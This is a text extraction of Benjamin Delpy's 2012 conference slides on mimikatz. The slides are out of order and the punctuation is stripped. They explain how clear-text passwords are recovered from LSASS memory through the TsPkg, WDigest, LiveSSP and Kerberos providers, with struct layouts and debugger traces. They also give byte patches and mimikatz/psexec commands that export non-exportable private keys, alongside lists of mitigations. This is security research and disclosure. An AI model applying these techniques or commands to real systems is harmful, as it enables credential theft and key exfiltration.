livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatzworking
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3
sekurlsadll
mimikatzexe
KeyIsolaquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLoglaquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
SamSSlaquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipeWrite a welcome messageWait commandshellip and return results
mimikatzarchitecture of sekurlsa amp crypto
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfreedll
kelloworlddll
klockdll
mimikatzsys
sekurlsadll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz sekurlsawhat is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5
mod_mimikatz_sekurlsa
mimikatz sekurlsahow LSA works ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6
LsaSSWinLogon
AuthenticationPackagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
userdomainpassword
PLAYSKOOL
mimikatz sekurlsahow LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7
PLAYSKOOL
mimikatz sekurlsahistory of laquo pass-the- raquo 12
Pass-the-hashndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo HernanOchoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticketndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8
mimikatz sekurlsahistory of laquo pass-the- raquo 22
Pass-the-passndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
